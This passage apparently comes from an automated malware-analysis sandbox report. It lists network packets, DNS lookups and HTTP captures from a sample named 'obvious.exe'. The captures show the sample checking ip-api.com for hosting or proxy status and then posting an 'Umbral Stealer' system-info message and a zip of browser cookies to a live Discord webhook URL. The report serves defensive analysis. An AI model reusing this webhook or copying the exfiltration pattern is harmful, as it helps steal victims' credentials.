                            Aug 27, 2024 20:05:37.840008974 CEST4973880192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:37.840641975 CEST4973880192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:37.848560095 CEST8049738208.95.112.1192.168.2.4
                            Aug 27, 2024 20:05:38.497677088 CEST8049738208.95.112.1192.168.2.4
                            Aug 27, 2024 20:05:38.509068966 CEST4973880192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:38.519134045 CEST8049738208.95.112.1192.168.2.4
                            Aug 27, 2024 20:05:38.519201994 CEST4973880192.168.2.4208.95.112.1
                            Aug 27, 2024 20:06:01.716226101 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:01.716267109 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:01.716362953 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:01.717652082 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:01.717660904 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.209083080 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.209160089 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.211054087 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.211060047 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.211299896 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.219053030 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.219280958 CEST4973180192.168.2.4208.95.112.1
                            Aug 27, 2024 20:06:02.226526976 CEST8049731208.95.112.1192.168.2.4
                            Aug 27, 2024 20:06:02.226630926 CEST4973180192.168.2.4208.95.112.1
                            Aug 27, 2024 20:06:02.264503956 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.346018076 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.401406050 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.428966045 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.428987026 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.729167938 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.729274988 CEST44349740162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.729327917 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.766123056 CEST49740443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.774349928 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.774396896 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:02.774508953 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.774772882 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:02.774790049 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.249159098 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.250725985 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.250739098 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.387237072 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.387676001 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.387707949 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.387811899 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.387816906 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.387901068 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.387917995 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.387958050 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.387963057 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388017893 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388029099 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388081074 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388091087 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388163090 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388170004 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388221025 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388233900 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388278008 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388283968 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388343096 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388355017 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388377905 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388386965 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388431072 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388443947 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388492107 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388501883 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388537884 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388550997 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388583899 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388595104 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388642073 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388654947 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388688087 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388700962 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388744116 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388753891 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388794899 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388808966 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388849020 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388858080 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388897896 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388906002 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388962984 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388976097 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.388986111 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.388988972 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389005899 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389018059 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389070034 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389076948 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389110088 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389117002 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389157057 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389163971 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389215946 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389230013 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389261961 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389271975 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389303923 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389312983 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389359951 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389368057 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389422894 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389430046 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389462948 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389475107 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389523029 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389533997 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.389569044 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389626026 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389672041 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389708042 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.389764071 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.401184082 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.401742935 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.401772022 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.401910067 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.401985884 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.402070045 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.402131081 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.402209044 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.406348944 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.406558990 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.406577110 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:03.406703949 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:03.415138960 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:04.230798960 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:04.230914116 CEST44349741162.159.136.232192.168.2.4
                            Aug 27, 2024 20:06:04.230973005 CEST49741443192.168.2.4162.159.136.232
                            Aug 27, 2024 20:06:04.231688976 CEST49741443192.168.2.4162.159.136.232

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Aug 27, 2024 20:05:04.573786020 CEST5180253192.168.2.41.1.1.1
                            Aug 27, 2024 20:05:04.581666946 CEST53518021.1.1.1192.168.2.4
                            Aug 27, 2024 20:05:37.804409027 CEST5996953192.168.2.41.1.1.1
                            Aug 27, 2024 20:05:37.827706099 CEST53599691.1.1.1192.168.2.4
                            Aug 27, 2024 20:06:01.708451986 CEST5069853192.168.2.41.1.1.1
                            Aug 27, 2024 20:06:01.715399981 CEST53506981.1.1.1192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Aug 27, 2024 20:05:04.573786020 CEST192.168.2.41.1.1.10x5d54Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                            Aug 27, 2024 20:05:37.804409027 CEST192.168.2.41.1.1.10x3691Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                            Aug 27, 2024 20:06:01.708451986 CEST192.168.2.41.1.1.10x815dStandard query (0)discord.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Aug 27, 2024 20:05:04.581666946 CEST1.1.1.1192.168.2.40x5d54No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                            Aug 27, 2024 20:05:37.827706099 CEST1.1.1.1192.168.2.40x3691No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                            Aug 27, 2024 20:06:01.715399981 CEST1.1.1.1192.168.2.40x815dNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                            Aug 27, 2024 20:06:01.715399981 CEST1.1.1.1192.168.2.40x815dNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                            Aug 27, 2024 20:06:01.715399981 CEST1.1.1.1192.168.2.40x815dNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                            Aug 27, 2024 20:06:01.715399981 CEST1.1.1.1192.168.2.40x815dNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                            Aug 27, 2024 20:06:01.715399981 CEST1.1.1.1192.168.2.40x815dNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • discord.com
                            • ip-api.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449731208.95.112.1807532C:\Users\user\Desktop\obvious.exe
                            TimestampBytes transferredDirectionData
                            Aug 27, 2024 20:05:04.590452909 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                            Host: ip-api.com
                            Connection: Keep-Alive
                            Aug 27, 2024 20:05:05.090801001 CEST175INHTTP/1.1 200 OK
                            Date: Tue, 27 Aug 2024 18:05:04 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 6
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Raw: 66 61 6c 73 65 0a
                            Data Ascii: false


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449738208.95.112.1807532C:\Users\user\Desktop\obvious.exe
                            TimestampBytes transferredDirectionData
                            Aug 27, 2024 20:05:37.840641975 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                            Host: ip-api.com
                            Aug 27, 2024 20:05:38.497677088 CEST379INHTTP/1.1 200 OK
                            Date: Tue, 27 Aug 2024 18:05:37 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 202
                            Access-Control-Allow-Origin: *
                            X-Ttl: 26
                            X-Rl: 43
                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449740162.159.136.2324437532C:\Users\user\Desktop\obvious.exe
                            TimestampBytes transferredDirectionData
                            2024-08-27 18:06:02 UTC360OUTPOST /api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX HTTP/1.1
                            Accept: application/json
                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                            Content-Type: application/json; charset=utf-8
                            Host: discord.com
                            Content-Length: 939
                            Expect: 100-continue
                            Connection: Keep-Alive
                            2024-08-27 18:06:02 UTC25INHTTP/1.1 100 Continue
                            2024-08-27 18:06:02 UTC939OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 39 32 37 35 33 37 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 5c 72 5c 6e 43 50 55 3a 20 49 6e
                            Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0\r\nCPU: In
                            2024-08-27 18:06:02 UTC1369INHTTP/1.1 204 No Content
                            Date: Tue, 27 Aug 2024 18:06:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            set-cookie: __dcfduid=057e3318649f11efb66596921a33ad9f; Expires=Sun, 26-Aug-2029 18:06:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                            x-ratelimit-limit: 5
                            x-ratelimit-remaining: 4
                            x-ratelimit-reset: 1724781963
                            x-ratelimit-reset-after: 1
                            via: 1.1 google
                            alt-svc: h3=":443"; ma=86400
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fKE%2BTJUC2HKtH5YF04okCg7f5Z0gVfwtFx9viOWndncnjHYUI94sSnhFfI4m4%2BRliSvQZuuAKuTpw0Xu3gmPbGEd6R6u9vwLo8ns2nCAK8CtGCgfruUYopuLvcVt"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Content-Type-Options: nosniff
                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                            Set-Cookie: __sdcfduid=057e3318649f11efb66596921a33ad9ff2c6a1766330374a53ed754cdc51d82f6f0a2d39c4c896c42ef89534fc2a0995; Expires=Sun, 26-Aug-2029 18:06:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                            Set-Cookie: __cfruid=23301c87e0e9c215d0688ab3be059f171b2b4c3a-1724781962; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                            Set-Cookie: _cfuv
                            2024-08-27 18:06:02 UTC194INData Raw: 69 64 3d 43 31 74 6b 63 4f 49 71 49 4f 31 53 56 4d 6f 50 4c 70 47 64 74 37 43 32 5f 79 48 34 52 41 38 53 43 30 6b 2e 56 4b 66 71 49 67 41 2d 31 37 32 34 37 38 31 39 36 32 36 37 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 39 64 66 65 34 30 35 38 63 63 37 63 66 34 2d 45 57 52 0d 0a 0d 0a
                            Data Ascii: id=C1tkcOIqIO1SVMoPLpGdt7C2_yH4RA8SC0k.VKfqIgA-1724781962672-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b9dfe4058cc7cf4-EWR


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449741162.159.136.2324437532C:\Users\user\Desktop\obvious.exe
                            TimestampBytes transferredDirectionData
                            2024-08-27 18:06:03 UTC684OUTPOST /api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX HTTP/1.1
                            Accept: application/json
                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                            Content-Type: multipart/form-data; boundary="300b1d7c-ee42-44f9-b0e2-2c0d7366a2e3"
                            Host: discord.com
                            Cookie: __dcfduid=057e3318649f11efb66596921a33ad9f; __sdcfduid=057e3318649f11efb66596921a33ad9ff2c6a1766330374a53ed754cdc51d82f6f0a2d39c4c896c42ef89534fc2a0995; __cfruid=23301c87e0e9c215d0688ab3be059f171b2b4c3a-1724781962; _cfuvid=C1tkcOIqIO1SVMoPLpGdt7C2_yH4RA8SC0k.VKfqIgA-1724781962672-0.0.1.1-604800000
                            Content-Length: 674498
                            Expect: 100-continue
                            2024-08-27 18:06:03 UTC25INHTTP/1.1 100 Continue
                            2024-08-27 18:06:03 UTC40OUTData Raw: 2d 2d 33 30 30 62 31 64 37 63 2d 65 65 34 32 2d 34 34 66 39 2d 62 30 65 32 2d 32 63 30 64 37 33 36 36 61 32 65 33 0d 0a
                            Data Ascii: --300b1d7c-ee42-44f9-b0e2-2c0d7366a2e3
                            2024-08-27 18:06:03 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 0d 0a 0d 0a
                            Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
                            2024-08-27 18:06:03 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 b2 70 1b 59 7b ff df 9a dd 06 00 00 11 0d 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 c5 57 4b 8f 9b c8 1a 5d 13 29 7f 23 1b 8b 6e 8a aa 82 aa 45 2f 78 fb 81 6d 0c 7e 6f 5a 80 0b 1b 83 c1 3c 0c b6 35 ca 6f bf b4 33 c9 24 52 6e d2 d1 2c 86 05 08 89 3a 75 be c7 39 5f f1 b4 cf f3 7d ca 9e c2 fc c4 cd dd 85 c1 3d 73 a6 62 7b 06 07 20 c4 92 04 88 24 40 89 48 80 42 6e 32 d0 39 0c c0 cb 91 78 b3 c5 3c ad b3 e5 02 87 53 85 dd ee 85 77 5d f1 45 7f ea 27 ee 45 ed eb 33 cb 9e 5b 2c 64 1a dd e2 d2 bd 27 b8 2e c7 a3 00 69 97 ad f6 aa 99 a7 50 1e 99 ed 2c 74 87 36 5f 58 77 32 6e 92 e4 3e de 9e 8c b4 59 2b e6 ca 9e f2 73 67 4b 9d 71 a1 6e 14 99 6c 95 8b cf ce d9
                            Data Ascii: PKpY{#Browsers\Cookies\Chrome Cookies.txtWK])#nE/xm~oZ<5o3$Rn,:u9_}=sb{ $@HBn29x<Sw]E'E3[,d'.iP,t6_Xw2n>Y+sgKqnl
                            2024-08-27 18:06:03 UTC16355OUTData Raw: 3e 26 13 f7 29 e8 7a bc c4 f3 b0 ae fa ad 7e 61 a3 f9 73 84 f6 ba e8 5b cf 0e 14 fb be 39 7b 5e 61 07 0c da 6c c8 f7 db aa 7a 1e 16 1a c6 6a 5b 23 dd e1 95 6d 21 bc 0a e4 6a 5e d0 96 50 23 b8 dc f9 56 e0 a3 28 c1 c7 dc 72 51 e2 7e c8 d1 93 2d 04 85 17 9a 32 f2 bb aa ec d1 8c eb b3 44 ea 8b 10 9e 4d 1e 55 01 56 2b 8b 36 3f 2f d4 73 fd 52 7a a6 8d d1 78 c0 f2 5d cb e9 7a f6 6c df 7c e5 5a bd 3e d8 4a 2c b4 ec d2 38 ec 8e 0a 48 2b de 6a a6 33 4d 11 24 61 56 77 69 f7 fc c7 6d 90 72 2a c4 cd e8 3f fc d9 3d eb e9 76 19 a4 f5 6f 2a f1 06 4d ea e2 ee 11 bd 36 bd 2b 50 c2 e7 dd 29 4b 5a 8a 8d 9e c9 9a 16 7f ac c5 b5 73 f4 ba c9 7f db c8 cb 45 49 80 64 6c 4c fd 11 58 a6 03 7f ed 35 70 f7 61 91 f0 a3 57 01 33 c6 7e 1e 2f 2a d4 32 28 63 f0 46 d6 4c 26 55 64 35 4c 0d
                            Data Ascii: >&)z~as[9{^alzj[#m!j^P#V(rQ~-2DMUV+6?/sRzx]zl|Z>J,8H+j3M$aVwimr*?=vo*M6+P)KZsEIdlLX5paW3~/*2(cFL&Ud5L
                            2024-08-27 18:06:03 UTC16355OUTData Raw: 3f c9 2f 0e 2e bc 80 14 b1 f4 0e 79 d4 f1 79 cf a4 02 f8 7d b4 3e fc 45 d3 b5 18 d5 65 f9 e9 eb a5 b6 06 05 0e 65 af 6e 29 ee 6a 3c db bb b0 c1 ae a6 3e 0b 26 c8 4e 52 6b 0e e2 3a 87 35 9c 9b 0d 5a d4 c8 1a 5c 62 28 f3 e1 b4 29 e9 fd 64 89 cb b6 e7 08 a9 e8 e1 2c 4b 66 e5 bc 43 9a 33 67 24 cd c6 24 cd 19 88 37 53 e9 ba 34 46 0e db 58 3e 0b ba 9a 86 fd 5e f8 8a 19 5b 31 df 9e df 2b 4b a9 51 c7 ae db 78 da c1 f4 37 5f ee 63 bb 19 ea ea 6b 02 39 35 20 39 77 da 53 b3 2f 9a 4f b4 a2 5e f5 e3 ac eb 61 19 44 c5 cf f4 29 4b c0 c4 11 32 f6 99 39 21 28 5c 4f 8b be c5 7c fe 56 79 ab d5 82 3e dd 81 36 61 75 ab 00 30 dc 78 5b bc f5 88 d6 b6 40 c8 d8 e6 0e 89 87 bf bd 0f 9d 64 c7 d8 a6 4d 99 80 df 77 92 9d 01 15 66 9f cb 1b d8 17 82 9c 8a a4 88 3a 88 e6 db 52 f2 1f c3
                            Data Ascii: ?/.yy}>Eeen)j<>&NRk:5Z\b()d,KfC3g$$7S4FX>^[1+KQx7_ck95 9wS/O^aD)K29!(\O|Vy>6au0x[@dMwf:R
                            2024-08-27 18:06:03 UTC16355OUTData Raw: e4 d7 24 14 e6 04 3e e0 fa 18 6c b4 da 73 85 5b c9 ed 22 07 6c 58 fb 7c 33 60 a2 76 ca f9 ed 8a 79 7b ff 8f ec 23 ac 2e 96 0e bf 10 50 3a 7c 0d 96 3d 44 ce c4 b5 19 bf ba fd 8d 35 6d b4 95 c1 cb e3 89 73 07 7c be c9 e3 6c 5d d9 a4 7b 3e 68 6e 54 2f f3 b3 1c 6d c3 fb a1 ad c7 00 6f 83 67 c2 93 5d fe dc 7f f6 cd 86 fa ba 49 0d 60 c1 3f 6d 98 ba f9 14 9b 8d 6d 6d ec 41 c3 ec 8c 88 44 76 ae d3 34 89 79 0e 47 34 65 6f 48 5e 63 7e 66 eb 32 c3 4d f3 38 3f 60 a1 6c dc 0d 5c 03 8c 27 17 71 89 ce f5 6d 1c dc 0a c1 be a0 a6 11 58 26 95 2a 9b 29 12 b6 f3 01 5d 38 f4 0b f4 c1 bc 6f fb 93 f7 0f 83 52 7f 22 d1 87 bd 67 8d bc ce 61 06 63 79 9f 98 9c 65 39 0d 5c e8 ef 8f cf 42 09 f4 9d ea 4b 39 61 8d 38 6c 1e f6 b1 b1 ff f0 ac 37 67 98 e9 dd 8e e2 c0 c9 b0 b5 6a e3 7f d6
                            Data Ascii: $>ls["lX|3`vy{#.P:|=D5ms|l]{>hnT/mog]I`?mmmADv4yG4eoH^c~f2M8?`l\'qmX&*)]8oR"gacye9\BK9a8l7gj
